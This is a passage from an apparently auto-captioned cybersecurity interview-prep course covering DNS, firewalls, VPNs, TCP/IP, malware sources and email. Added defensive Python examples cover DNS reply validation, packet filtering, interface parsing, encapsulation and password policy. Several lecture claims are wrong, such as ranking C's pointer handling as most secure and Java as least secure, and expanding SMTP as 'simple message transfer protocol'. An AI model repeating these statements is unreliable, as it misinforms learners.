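        length = msg[offset]
        if length & 0xC0 == 0xC0:                     # two-byte compression pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if end is None:
                end = offset + 2
            offset = pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), end if end is not None else offset


def parse_message(msg):
    """Parse the header, question and answer sections of a query or a response."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    questions = []
    for _ in range(qdcount):
        name, offset = decode_name(msg, offset)
        qtype, _qclass = struct.unpack("!HH", msg[offset:offset + 4])
        offset += 4
        questions.append((name, qtype))
    answers = []
    for _ in range(ancount):
        name, offset = decode_name(msg, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)   # dotted-quad IPv4 address
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "rcode": flags & 0x0F, "questions": questions, "answers": answers}


def build_response(query, ip, ttl=300, txid=None):
    """Constructed reply a DNS server would return for a single A question.

    The answer's owner name is a pointer (0xC00C) back to the question name at
    offset 12. `txid` lets a caller forge a reply whose ID does not match.
    """
    if txid is None:
        txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1, RD=1, RA=1
    question = query[12:]
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4)
    return header + question + rr + bytes(int(x) for x in ip.split("."))


def accept_response(query, response):
    """Trust a reply only if its ID and question echo the query we sent."""
    q, r = parse_message(query), parse_message(response)
    return q["id"] == r["id"] and q["questions"] == r["questions"]


# Constructed sample exchange using the course's cybersecurity.com example.
SAMPLE_QUERY = build_query("cybersecurity.com")
SAMPLE_RESPONSE = build_response(SAMPLE_QUERY, "172.17.252.1")

if __name__ == "__main__":
    print(SAMPLE_QUERY.hex())
    print(parse_message(SAMPLE_RESPONSE))
```

The ID-and-question check in `accept_response()` is the minimum a stub resolver needs so that an unsolicited or forged reply arriving on its socket cannot plant an address it never asked for.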

If one particular DNS server does not have the information that you're looking for, it may query another DNS server which may have that particular response. So the first thing is, when you type in a domain name it gets resolved with the DNS; it identifies the IP address corresponding to that particular domain name and thus allows the computer to route that packet to the particular server where that domain name resides. So in this scenario, if you look at the screen, on the local PC you have typed in cybersecurity.com; there's a DNS resolution, a query that goes to the DNS server: what is the IP of cybersecurity.com? The DNS server looks it up in its particular database; if it has the corresponding IP address, it will then respond back that the IP address is 172.17.252.1, after which the packet is sent off to cybersecurity.com.

Moving on to question number four: what is a firewall? Now, this is a very good question, and normally a very basic answer that I've heard is that a firewall is a hardware and a software firewall. But that's the form of a firewall, that is how we can install a firewall; there are different types of firewalls, and there is a specific functionality that the firewall is created for, right? So a firewall is either hardware or software, but its responsibility is blocking either incoming or outgoing traffic from the internet to your computer; they secure a network. So essentially the firewall will allow a connection to happen or disallow a connection from happening; it won't go beyond that. That's the basic functionality of a firewall, okay? So based on the configuration that you have done, based on the rules that you have created on the firewall, it will then, based on those rules, identify whether some traffic is allowed into that network or some traffic is to be blocked from entering that network. So as the screen shows, the firewall rules will analyze whether the traffic is good; if yes, it will allow it; if the traffic is bad, it will block the traffic and not allow that connection from happening in the first place.

Now, there are a few common types of firewalls that also need to be included in the answer to this question, and the first one is a packet filtering firewall. These are the most common types that you will come across, which analyze packets and let them pass through only if they match an established security rule set. Now, here people do get confused: when we say that we analyze packets, people think that these firewalls will analyze the contents of that packet, which is not correct. When the definition of a packet filtering firewall says that these firewalls analyze packets, it means that they are only analyzing the source and destination IP addresses, port numbers and the protocols that are mentioned in those packets. These firewalls do not have the capability of deep packet inspection, or DPI as it is known. If that capability comes into the picture, you are basically looking at an intrusion detection system or an intrusion prevention system, in today's world called a next-gen firewall, okay? So a packet filtering firewall essentially will only analyze data packets for their source and destination IP addresses, port numbers and the protocol that is being utilized. It will then map that information to the rules that are there on the firewall, and based on those rules it will either allow that connection to happen or disallow that connection from happening.

The second type is a proxy firewall. These firewalls filter network traffic at the application level. So when you say application level, they work at layer 7 of the OSI model. Packet filtering firewalls, since we have mentioned that they work on IP addressing and port numbers, will work on the network layer of the OSI model and also on the transport layer, because you also look at protocols. Proxy firewalls will work at layer 7, which is the application layer of the OSI model, and will deal with application-level protocols such as HTTP, HTTPS, FTP, SMTP and so on and so forth. And the third one is a stateful multi-layer inspection firewall. These filter packets at the network, transport and application layers, so they basically do the job of the first and the second type of firewalls; the packets are compared to known trusted packets. But now the first question is: if there is a stateful multi-layer inspection firewall, why do we have type one and type two firewalls, like packet filtering and proxy firewalls? That is because that is how firewalls have evolved: we started off with packet filtering, then we added functionality to it, and so on and so forth.

So if a question comes, what is a firewall, you start off by saying it is a hardware or software; the responsibility, the functionality, of a firewall is to allow good traffic and disallow bad traffic based on the rules that have been configured on the firewall; and then you've got basically three types of firewalls, packet filtering, proxy and stateful multi-layer, and just include a brief description of each of these firewalls.
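The packet filtering behaviour described for the first type of firewall, as an added example that is not part of the course: a constructed rule set for a small network (private and documentation address ranges, a web server, a database server) evaluated first-match-wins on protocol, source and destination address and destination port, with everything unmatched dropped by default. The packet dictionaries are constructed test inputs; note that `evaluate()` never reads the payload field at all, which is exactly the point made above about packet filters lacking deep packet inspection.

```python
# Added example, not part of the original course: a packet filtering firewall's
# decision logic. Rules are evaluated first-match-wins on protocol, source and
# destination address and destination port only; anything unmatched is dropped.
from ipaddress import ip_address, ip_network

# Constructed rule set for a small network with a public web server and an
# internal database server (addresses are private/documentation ranges).
RULES = [
    # (action, protocol, source network, destination network, destination port)
    ("allow", "tcp", "0.0.0.0/0",      "192.168.1.10/32", 443),   # anyone -> web server HTTPS
    ("allow", "tcp", "192.168.1.0/24", "192.168.1.20/32", 3306),  # LAN only -> database
    ("allow", "udp", "192.168.1.0/24", "0.0.0.0/0",       53),    # LAN -> outbound DNS
    ("deny",  "any", "0.0.0.0/0",      "0.0.0.0/0",       None),  # explicit catch-all
]


def rule_matches(rule, packet):
    """True if the packet's header fields fall within the rule's fields."""
    _, proto, src_net, dst_net, dport = rule
    return (
        proto in ("any", packet["proto"])
        and ip_address(packet["src"]) in ip_network(src_net)
        and ip_address(packet["dst"]) in ip_network(dst_net)
        and dport in (None, packet["dport"])
    )


def evaluate(packet, rules=RULES):
    """Return (action, index of the matching rule); default deny when nothing matches."""
    for index, rule in enumerate(rules):
        if rule_matches(rule, packet):
            return rule[0], index
    return "deny", None


def filter_log(packets, rules=RULES):
    """Decisions for a batch of packets, in the shape a firewall log would record."""
    return [(p["src"], p["dst"], p["proto"], p["dport"], *evaluate(p, rules))
            for p in packets]


if __name__ == "__main__":
    # Constructed traffic: same HTTPS header with two different payloads, plus an
    # outside host trying the database port. The payload never influences the verdict.
    sample = [
        {"proto": "tcp", "src": "203.0.113.5", "dst": "192.168.1.10", "dport": 443,
         "payload": b"GET / HTTP/1.1"},
        {"proto": "tcp", "src": "203.0.113.5", "dst": "192.168.1.10", "dport": 443,
         "payload": b"anything else at all"},
        {"proto": "tcp", "src": "203.0.113.5", "dst": "192.168.1.20", "dport": 3306},
    ]
    for entry in filter_log(sample):
        print(entry)
```

Because the verdict depends on header fields alone, two packets that differ only in payload receive the same decision; inspecting what is inside the allowed HTTPS connection is the job of the IDS/IPS or next-gen firewall the course mentions, not of this layer.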

If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn; click on the link in the description to know more.

Then, moving on to question number five: what is a VPN? VPN is also called a virtual private network. It is a connection between a VPN server and a VPN client. So it basically creates an encrypted tunnel between the client and the VPN server, which is then utilized to secure the connections that you're making with the internet. So as you can see in the diagram, the user has a VPN client installed on the machine. The VPN client then creates an encrypted tunnel to the VPN server, and through this tunnel encrypted data is transmitted, which can then be processed by the VPN server and sent to the internet; information can be received back by the VPN server, and the VPN server will encrypt that data and send it back to the user. So if there is a man-in-the-middle attack happening, or a hacker trying to eavesdrop on the communication mechanism, they will not be able to do so because of the encrypted tunnel. It is very difficult to decrypt this or hack through this encrypted tunnel; it is possible, but it is very difficult to achieve that.

Moving on to question number six: what are the advantages of distributed processing? Now, before we go into the advantages of distributed processing, we first have to understand what distributed processing is. So it is a term which describes various computer systems that use more than one processor to run an application. Here multiple computers across different locations share the same processor. The advantages of distributed processing are as follows, but before we go into the advantages: distributed computing is basically where multiple machines will pool their resources together to run a singular application, so an application that has multiple resources and can scale up and scale down as and when required. The advantages are that it can be very, very useful in data recovery, for example RAID, where you're striping data on various hard disks; it is reliable; it is cheaper, lower cost can be achieved; and it is easy to expand because of the scalability factor that we just talked about. If there is loss of data in one computer, it can then be recovered by another interconnected computer, and one of the examples would be blockchain in today's world, right? What is blockchain? That this data is created live and stored on a collection of computers, so if one of the computers goes offline, the other computers in that network will still have that data and the blockchain will still function without any issues. The second point: a glitch in one machine does not affect the processing, as there will be multiple other machines, like we discussed in the blockchain. Several cost-effective minicomputers are used instead of costly mainframe machines, so instead of having a server bank I can have multiple machines interconnected together, and they can function in that particular blockchain or for that particular distributed processing mechanism. Depending on the amount of data processing, more computers can be attached to the network; thus you can increase the number of computers that can be a part of that blockchain, or you can reduce them as and when necessary.

Moving on to question number seven: what is TCP/IP?

TCP/IP, or transmission control protocol over internet protocol, is a set of communication protocols that are used to interconnect networking devices on the internet. This protocol defines how data should be transmitted over the internet by providing end-to-end communications. So essentially, if you want networking to be established on your machine, you will need TCP/IP. Without TCP/IP there will be no workgroups, there will be no domains; basically your interconnectivity will go for a toss. TCP is a software that, once installed on your machine, will then interact with the hardware, which is your network interface cards, and then your switches, wires, cables and all those, through protocols that have already been pre-configured in it. So within the TCP suite of software you will have all the protocols, all the functionality of the OSI layers, and each and every protocol that works on each and every layer will be predefined and pre-configured to work in a particular manner. The internet protocol is all about routing each individual packet to make sure it reaches its destination. So with TCP you're talking about the protocols that will allow you to format the data and generate it so that you can communicate it over the network; IP will then deal with the routing of those packets so that the packet can be routed to the correct computer and be received by the recipient. So the TCP model is the compressed version of the OSI: the seven layers get converted into four layers, the network access layer, internet layer, transport layer and application layer.

Going on to question eight: what do you mean by ipconfig and ifconfig? Both of these are commands, the first one on a Windows machine, the second one on a Linux machine. So ipconfig is known as the internet protocol configuration. This is a command that is used on the command line interface of Microsoft Windows to view all the adapters and the configuration of each and every adapter for their network interfaces. So as you can see on the right-hand side, in the command prompt screen, once you type in the ipconfig command at the command prompt and press enter, it will give you a list of all the adapters that are there. So you can see the wireless LAN adapter local area connection, the media is disconnected, it doesn't exist; at the bottom you will see the Wi-Fi connection, wireless LAN adapter, and it gives you the IP version 6 IP address, the IPv4 address, the subnet mask and the default gateway.
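What the address, mask and broadcast shown by ifconfig/ipconfig actually tell a host, as an added example that is not part of the course and also ties back to the unicast, multicast and broadcast question above: `parse_ifconfig()` reads a constructed ifconfig-style listing (interface name and MAC are invented; the IPv4 address, netmask and broadcast are the ones from the ifconfig screen discussed in this question), `interface_summary()` derives the network, prefix, broadcast address and usable host count from the mask, and `classify_destination()` decides whether a given destination is reached as unicast on the local segment, unicast through the default gateway, multicast, or broadcast.

```python
# Added example, not part of the original course: read the addressing shown by
# ifconfig/ipconfig, work out what it tells a host about its network, then decide
# how a destination would be reached (unicast, multicast or broadcast).
from ipaddress import ip_address, ip_interface

# Constructed ifconfig-style output. Interface name and MAC are invented; the IPv4
# address, netmask and broadcast are the ones shown on the course's ifconfig screen.
SAMPLE_IFCONFIG = """\
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.43.215  netmask 255.255.255.0  broadcast 192.168.43.255
        ether 02:00:00:00:00:01  txqueuelen 1000  (Ethernet)
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
"""


def parse_ifconfig(text):
    """Return {interface: (ipv4 address, netmask)} from ifconfig-style output."""
    interfaces, current = {}, None
    for line in text.splitlines():
        if line and not line[0].isspace() and ":" in line:
            current = line.split(":", 1)[0]          # new interface block
        elif current and "inet " in line and "netmask" in line:
            tokens = line.split()
            interfaces[current] = (tokens[tokens.index("inet") + 1],
                                   tokens[tokens.index("netmask") + 1])
    return interfaces


def interface_summary(ip, netmask):
    """What the address and mask tell the host: its network, broadcast and host range."""
    network = ip_interface(f"{ip}/{netmask}").network
    return {
        "network": str(network.network_address),
        "prefix": network.prefixlen,
        "broadcast": str(network.broadcast_address),
        "usable_hosts": network.num_addresses - 2,   # minus network and broadcast addresses
    }


def classify_destination(dst, ip, netmask):
    """How a host at ip/netmask delivers a packet addressed to dst."""
    network = ip_interface(f"{ip}/{netmask}").network
    target = ip_address(dst)
    if target == ip_address("255.255.255.255") or target == network.broadcast_address:
        return "broadcast"             # one to all on this segment
    if target.is_multicast:
        return "multicast"             # one to many: 224.0.0.0/4, group membership via IGMP
    if target in network:
        return "unicast, on-link"      # one to one, delivered directly on the local network
    return "unicast, via gateway"      # one to one, handed to the default gateway


if __name__ == "__main__":
    ip, mask = parse_ifconfig(SAMPLE_IFCONFIG)["wlan0"]
    print(interface_summary(ip, mask))
    for dst in ("192.168.43.1", "172.17.252.1", "239.1.2.3", "192.168.43.255"):
        print(dst, "->", classify_destination(dst, ip, mask))
```

The 255.255.255.0 mask is what answers the "how many computers may exist in that network" question: a /24 leaves 254 usable host addresses, with 192.168.43.255 reserved as the broadcast address that the one-to-all case uses.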

So this is the configuration that allows the machine to know on what network it is on what is the default gateway for communicating to the internet what is the subnet mask so how many computers may exist in that particular network and what is the ip address of that specific

Computer so that it can communicate across the network as well ifconfig is the same thing on the linux mac or unix operating system so the command will also give you the list of interfaces and the configuration of each and every interface it is used to configure controller tcp network interface parameters from the

Command line interface it allows you to see the ip address of these network interfaces so here you can see the wlp19s the ipr is being 192 168 43.215 subnet mask being 255.255.255.0 with the broadcast being 192.168.43.255. question nine what is the difference between a domain

And a work group this can be a very interesting question and can be a very lengthy question at the same time a work group is nothing but a decentralized network where you have interconnected multiple machines together and each machine acts in its own individual capacity thinks of itself as a server right

So a decentralized network use every user manages the resources individually on their pc so local users on their own pcs managing the network shares what can be shared from that particular machine what data should be shared should not be shared to whom it can be shared with and so on so forth

It is good if you’ve got a small network a few machines altogether and you want them to interact with minimal management effort right so each computer each user will decide what they want to allow other users to see on that particular network and all of them would be connected over

A lan a local area network either a wireless or a wired one so if you look at your home wi-fi right now that is one of the best examples of having a work group the domain on the other hand is a centralized network model so in a corporate environment whenever you go

There and you got a domain base username and password which when entered onto a particular machine gives you access to the entire network or whatever applications and whatever resources have been allocated to you that is where the domain comes in so it also uses a single sign-on mechanism for

All the resources that are made that are to be made available to you whereas in a work group your local user only meant for that particular computer right so coming back to the domain it is an administrator who is going to manage the entire domain and all of the resources

Connected to the domain the resources could be switches routers servers data stores applications web servers mail exchange servers and so on so forth so all of these are administered by an administrator through the domain it is the most reliable and optimum solution for a large network where multiple users are going to interconnect

And share that data amongst each other right the computer can be connected to any network that means you can be on the internet and through the internet using a vpn you can connect to your corporate network authenticate in and get access to whatever resources you are allowed to

Access whereas in a work group you have to be a part of that network to access that particular network if you change your location you go and connect to another wi-fi you will lose access to your previous wi-fi then the last question for the networking section what is data encapsulation in

Networking data encapsulation refers to the process of adding headers and trailers to the data the data link layer binds each packet into a frame that contains the hardware address of the source and the destination computer so in this example when you’re talking about data encapsulation we have talked about how

Data that has been created by the application layer we’d have a header and a trailer that will give the various informations of where that data needs to be sent so the hardware address which is the mac address comes into the picture and gets added to the header and the ip addresses port numbers

And all of those things would then be added to these trailers as well so that the data can then be routed to the intended recipient of that particular communication with this we end the first 10 questions in networking and in this video we are going to look at software and
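The layering just described, as an added illustration that is not part of the course: a Python script that wraps a constructed payload in a transport header (port numbers), a network header (IP addresses) and a data link header (MAC addresses) plus a CRC frame-check trailer, then peels the layers back off and verifies the trailer. The header layouts are reduced to their addressing fields and are not wire-compatible with a real TCP/IP stack; all addresses are constructed sample values.

```python
"""Data encapsulation and decapsulation, layer by layer.
Added illustration (not course material): headers are reduced to their
addressing fields, so they are not wire-compatible with real TCP/IP stacks."""
import struct
import zlib

# Constructed sample addresses, not taken from any real network.
SRC_MAC = bytes.fromhex("02aabbccdd01")
DST_MAC = bytes.fromhex("02aabbccdd02")
SRC_IP = "10.0.0.5"
DST_IP = "10.0.0.9"
ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def bytes_to_ip(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def encapsulate(payload: bytes, src_port: int, dst_port: int) -> bytes:
    """Application data -> TCP segment -> IP packet -> Ethernet frame."""
    # Transport layer: port numbers identify the sending and receiving process.
    segment = struct.pack("!HH", src_port, dst_port) + payload
    # Network layer: protocol number plus source/destination IP addresses.
    packet = struct.pack("!B4s4s", PROTO_TCP, ip_to_bytes(SRC_IP), ip_to_bytes(DST_IP)) + segment
    # Data link layer: destination/source MAC and EtherType in the header ...
    frame_body = DST_MAC + SRC_MAC + struct.pack("!H", ETHERTYPE_IPV4) + packet
    # ... and a frame check sequence (CRC-32 over the frame) as the trailer.
    fcs = struct.pack("!I", zlib.crc32(frame_body) & 0xFFFFFFFF)
    return frame_body + fcs


def decapsulate(frame: bytes) -> dict:
    """Check the trailer, then strip the headers in reverse order."""
    body, fcs = frame[:-4], frame[-4:]
    if struct.unpack("!I", fcs)[0] != (zlib.crc32(body) & 0xFFFFFFFF):
        raise ValueError("frame check sequence mismatch: frame corrupted")
    dst_mac, src_mac = body[:6], body[6:12]
    ethertype = struct.unpack("!H", body[12:14])[0]
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("unexpected EtherType 0x%04x" % ethertype)
    packet = body[14:]
    proto, src_ip, dst_ip = struct.unpack("!B4s4s", packet[:9])
    segment = packet[9:]
    src_port, dst_port = struct.unpack("!HH", segment[:4])
    return {
        "dst_mac": dst_mac.hex(":"), "src_mac": src_mac.hex(":"),
        "proto": proto, "src_ip": bytes_to_ip(src_ip), "dst_ip": bytes_to_ip(dst_ip),
        "src_port": src_port, "dst_port": dst_port, "payload": segment[4:],
    }


def is_valid_frame(frame: bytes) -> bool:
    """True when the trailer matches the frame contents (no bit flips in transit)."""
    try:
        decapsulate(frame)
        return True
    except (ValueError, struct.error):
        return False


if __name__ == "__main__":
    frame = encapsulate(b"GET / HTTP/1.1", src_port=40000, dst_port=80)
    print(len(frame), "byte frame:", frame.hex())
    print(decapsulate(frame))
```

Each layer only reads its own header and hands the rest up unchanged, which is why a switch needs only the MAC header, a router only the IP header, and the receiving host's TCP stack only the ports; the trailer is what lets the receiver discard a frame that was damaged in transit.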

Programming so we’re going to look at the first 10 questions first question being how do you keep a computer secure now this is going to be a very generic question so you want to put your best foot forward and you want to identify the most common methodologies on how you can keep a

Computer secure so when you talk about computers the first thing that you want to talk about is authentication mechanisms where you want multi-factor authentication or two-way authentication to ensure that your accounts are kept secured now if you look at using passwords depending on how passwords are being stored by the

Application password attacks can be possible either a brute force attack or a dictionary based attack or even password guessing attacks are possible to mitigate those kinds of attacks we need multi-factor authentication to ensure that accounts are kept secure now even if we are using multi-factor

Authentication we also want to look at secure passwords which means that the password is complex enough to withstand most of the common attacks and a brute force attack or a dictionary attack is just not possible so we want to randomize our passwords we want to create a complexity where a password

Meets standards such as having at least one lowercase and one uppercase character having numerics and special characters and being randomized not based on a dictionary word and not containing usernames email addresses phone numbers or anything that is personal to that particular user third keep regular updates which means
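The complexity rules just listed, written out as a check, as an added example that is not from the course: a Python function that reports every rule a candidate password breaks, including a dictionary-word test that first undoes common letter substitutions and a test against the user's own username, e-mail and phone number. The word list and the user profile are constructed for illustration; a real deployment would load a proper wordlist.

```python
"""Password-policy check for the complexity rules described above.
Added example, not course material: the word list and sample profile are
constructed here; a real check loads a full wordlist."""
import re
import string

# Constructed tiny "dictionary" of common words; real checks use large wordlists.
COMMON_WORDS = {"password", "welcome", "summer", "letmein", "qwerty", "admin"}

# Undo the usual leetspeak swaps so "P@ssw0rd" is still recognised as "password".
_UNLEET = str.maketrans("@0$1!3", "aosiie")


def password_problems(password: str, username: str = "", email: str = "",
                      phone: str = "", min_length: int = 12) -> list:
    """Return the policy rules the password violates; an empty list means it complies."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.isdigit() for c in password):
        problems.append("no digit")
    if not any(c in string.punctuation for c in password):
        problems.append("no special character")

    lowered = password.lower()
    # Dictionary rule: strip substitutions and non-letters, then look for known words.
    letters_only = re.sub(r"[^a-z]", "", lowered.translate(_UNLEET))
    if any(word in letters_only for word in COMMON_WORDS):
        problems.append("built on a dictionary word")

    # Personal-data rule: username, e-mail local part and phone digits must not appear.
    personal = [username, email.split("@")[0], re.sub(r"\D", "", phone)]
    for item in personal:
        if len(item) >= 3 and item.lower() in lowered:
            problems.append(f"contains personal data ({item})")
    return problems


def is_compliant(password: str, **profile) -> bool:
    return not password_problems(password, **profile)


if __name__ == "__main__":
    profile = dict(username="alice", email="alice@example.com", phone="+1 555 0199")
    for candidate in ("P@ssw0rd123!", "Alice2024!xyz", "Tq7#vLp!9zRm"):
        print(candidate, "->", password_problems(candidate, **profile) or "OK")
```

Note that the character-class rules alone would have accepted "P@ssw0rd123!"; the substitution-aware dictionary test is what catches it, which is the same normalisation a dictionary-attack tool applies in the other direction.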

That there will be patches that will be released for the application for the software that you’re utilizing download the patches install them on a regular basis to ensure that you are secured against the most recent attacks that have been identified install a good antivirus could be an internet security suite which

Will have an antivirus an intrusion detection system a firewall and will help you protect yourself against ransomware malware and any script-based attacks also have a specialized firewall on your system could be a host-based firewall or a network-based firewall to ensure that attacks are kept at a minimum and you

Have your network definitions in place to allow or disallow connections from happening to your devices have anti-phishing software installed as well to ensure that you are not getting any spam mails even if you do you are able to identify that and not fall prey or victim to those spam mails

Phishing attacks are generic where they are directed towards individuals and they prey on the gullibility of that particular individual so our nigerian frauds or the lotteries that we win on a regular basis of hundreds of million dollars those messages the emails that we receive they are all phishing emails where they’re basically

Prone to victimize the user and then rob them of money or install some malware or do some other malicious activity if you want to enhance protection of data that you have stored on your devices or that is accessed by your software or being transmitted by your software use encryption

Encrypt your data whether it is at rest whether it is in motion or whether it is in use thus reducing data leakage and data loss possibilities and finally and foremost secure your dns dns is the domain name server which is utilized by computers to resolve domain names to ip addresses

If a dns poisoning attack is possible where your dns settings have been modified by an attacker and you are redirected to a malicious dns server that server is going to redirect you to another malicious application which may have a malware or a malicious software as a payload

Also you don’t want people to know your dns servers and the queries that you’re making so you want to use secure dns or dns over https to encrypt your dns queries as well so in a nutshell if you follow these eight steps your devices your computers your

Applications are going to be as secure as possible the next question discuss security related aspects between c c++ and java now this is an open-ended question it depends on which level you’re giving an interview at but we’re looking at it from a fresher’s perspective or a less experienced perspective

And thus these are some of the aspects that we want to look at and the comparisons between c c++ and java so the five aspects that we are looking at are pointers code translations storage allocation inheritance and overall security for c c++ and java so when we say

Pointers we are looking at how we are using pointers and stacks and heaps to point to functions and how we exit those functions and how those functions are then recalled into the next function so c supports pointers it is most secure c++ also supports pointers

But it is a little bit less secure than c in java it is not supported direct access is given to memory allocation and thus it is the least secure as far as pointers are concerned when we look at code translations c is able to compile but it is not secure

Same with c++ but java is an interpreted language and it is abstracted and secured in storage allocation in c we use malloc and calloc memory allocation which is less secure because it does not have internal checks on verifying what memory is allocated and

The user input that is being compiled or that is being input to that memory right thus this can allow buffer overflow errors to creep in because of the non-verification of the input data so it is the least secure in c++ it uses new and delete options and is

Comparatively secure but java uses a garbage collector and thus is the most secure as far as storage allocation is concerned when we talk about inheritance the most secure is c++ c has no inheritance so it’s not secure in c++ it is supported

Thus it is the most secure whereas in java multiple inheritance is not supported and thus it is comparatively secure overall the most secure out of all these based on these five aspects is java the least secure is c and the mid level is c++ moving on to

Question 13 what are the different sources of malware now malware stands for malicious software right malware is basically a software that poses as a legitimate software but has a payload of a trojan virus spyware keylogger or some malicious software that is going to have a negative impact on security of your particular device

So the question here is what are the different sources of malware we want to identify the most common sources through which malware infects end user devices in today’s world and you can start with pop-up ads so most of the websites if you’re visiting untrusted sites if you’re being redirected to sites that

You don’t know about there’ll be a lot of pop-ups coming your way where it says you’re the 1 millionth visitor to this site please click here to download your gift or it will say congratulations on winning a particular product for visiting this page and so on so forth

There are some instances where you can see a banner which is flashing at you on top of the page and says that there are eight infections that have been identified on your computer click here to download an antivirus to clean the infections so all of these pop-ups

Are there as a social engineering attack as a phishing attack to make gullible people click on those links and download those malwares now the software that is posing as a security software itself can be a malicious software which is going to install a trojan or a virus or a bot

On your machine compromising the security of that machine the second is removable media usbs and humans have a fascination with usb so if you find a usb lying around it’s a free usb you get excited about it and you want to take it home you want to plug it into a

Machine and see what’s on the usb worst case scenario you format it and you’ve got a free usb to utilize the higher the capacity the better but that is one of the easiest ways malware gets deployed on unsuspecting users if there is a usb lying around

Why would somebody want to forget a usb it’s most likely planted over there as a social engineering attack so that a gullible person is going to pick it up plug it into their device if the device is not secured enough it is going to install the malware right

Then documents and executable files this is where your viruses and all of those creep in so let’s say you’re surfing on the internet you’re looking for a software and you find the software on a particular website you do not verify the trustworthiness of that site and you just download and install that

Software now that software could be malware as well thus if you’re surfing on the internet you’re downloading files from different locations you have to research the website you have to research the source to ensure that it is trustworthy and only then are you going to download and execute those files thus

Internet downloads as well and when we say internet downloads it’s not just untrustworthy sites we go to torrents we go to the dark web or the deep web and we are searching for other software especially those who are researching security right we are always on the

Lookout for new software and we are always on those forums which may not be so trustworthy and we just download those files and start installing them that is a very bad scenario right so you have to be very careful what you are downloading from the internet your antivirus your

Anti-phishing mechanisms your threat intelligence mechanisms have those mechanisms installed and you want to verify where your downloads are coming from then your network connections if it is a p2p connection a local area network connection or a metropolitan area network you have to verify

Which devices are connected to your machines and you have to validate those connections before you trust those devices and before you connect to them if you’re on a public wi-fi you probably don’t want to connect to a public wi-fi in the first place then comes email attachments

There are so many attachments that come across in today’s world most of them in a zip format or a rar format some of them come as document files where there are macros hidden within them macros are scripts that are recognized by microsoft office files right and then finally there are these

Malicious advertisements that we find online right let it be facebook let it be whatsapp let it be any social media platform that you go to or even your search engines their job is to display ads their job is not to verify whether the ad is legit or

Not it is for us as consumers to be careful and validate that ad and verify whether it is a genuine ad or not so just don’t start clicking on any of the ads trusting the platform that you’re on be sure that you are investigating that so these are the most common

Sources of malware and the end user will always get infected by one of these mechanisms moving on to question 14 how does email work now this can be a complex question but we have to keep it as simple as possible and we have to identify that there are

Two servers both of them using smtp which is the simple message transfer protocol where in this scenario john wants to send an email thus they’ve got an email client installed on their machine which is connected to the mail exchange server which has a dns server

Which maps the routing and which maps the exchange server and inboxes so when john composes that message and clicks on send john should be connected to a mail exchange server where the email is sent through that particular person’s inbox so john’s inbox will then be validated and that

Email will then be sent through the dns server through the internet and will be received by the recipient mail server so at this point in time john also requires the recipient’s email address so in this case this is jack so jack@something.com would be the email address

So while john is composing the to field will have jack’s email address the from field will have john’s email address the subject field will have whatever they want to convey as a message the message body will have the message itself and then when john clicks on send it will go to

The exchange server the exchange server will then validate the inbox and identify where that inbox is located for jack and then through the internet it will be sent to the mail server of jack the mail server will then identify the proper inbox that that email needs

To be sent to and it will store that email in that particular inbox when jack opens their computer and accesses their inbox this email from john will be already waiting for them and they can respond to it the same way john had sent that email

Moving on to question 15 what are the types of threats a company can face right and this is where your threat modelling comes into the picture so

You’re looking at software you’re looking at operating systems and the company comes and asks you what are the threats that are most likely that a company will face so on a broader scale the threats that a company will always face would be classified as natural threats man-made threats

Technical threats and a supply system threat so a natural threat would be an act of god which is outside the control of human beings could be storms or any natural occurrences like volcanoes thunderstorms flooding earthquakes fire and so on so forth so anything that is natural so it depends on the geographic

Location that you’re in and what kind of climate that area faces and you need to identify the immediate threats and prepare for them so if it is flooding that you’re looking at and you want to look at an office and the possibility of the office getting flooded is real you probably

Want to take office at a higher floor so that the threat of flooding is minimized for fire we always have a fire drill where we practice our fire mechanism so that we can evacuate all humans as soon as possible and then worry about the technicalities of it under any

Circumstances under any threats humans will always have the first priority and then everything else comes in man-made threats are where man themselves are a problem so strikes lockouts hackers theft war rioting all of those are man-made threats which we ourselves cannot be in control of but

We need to plan for them and we need to have a business continuity plan or a disaster recovery plan for any of these threats that have been identified then come the technical threats technical could be software bugs operating system bugs application bugs that come with the applications that we

Have or a hardware failure where a server crashes a hard disk crashes maybe the processor stops working the motherboard stops working ram gets corrupted any of the technical aspects stopping functioning thus creating a break in the business can come under technical right so anything to do with computers

Let’s say a server failing or a patch that is not installed on the particular software those would come under technical threats and then the supply system the supply system are your environmental threats which depend on your supply chain failures what is the supply chain for

The office to function there are a lot of dependencies that the office goes through right there are a lot of other vendors that support and provide critical infrastructure and non-critical infrastructure for the office to function first and foremost electricity without electricity nothing is going to

Be powered on and you’re not going to be able to function so if there is an electricity service provider and if there’s an electric outage that comes under supply system so that’s a supply chain failure where the vendor that provides electricity to you has failed in providing that particular

Service and now you need a business continuity or a disaster recovery plan so you probably have an inverter or you already have a power generator plant that is going to generate your own power and supply to your system right there could be short circuits because of fluctuation in the

Electricity maybe the internet service provider fails and your internet crashes so you have a backup line for the internet from a different vendor right and so on so forth maybe your hardware vendors who are supplying you servers desktops laptops and whatnot fail because they are facing a

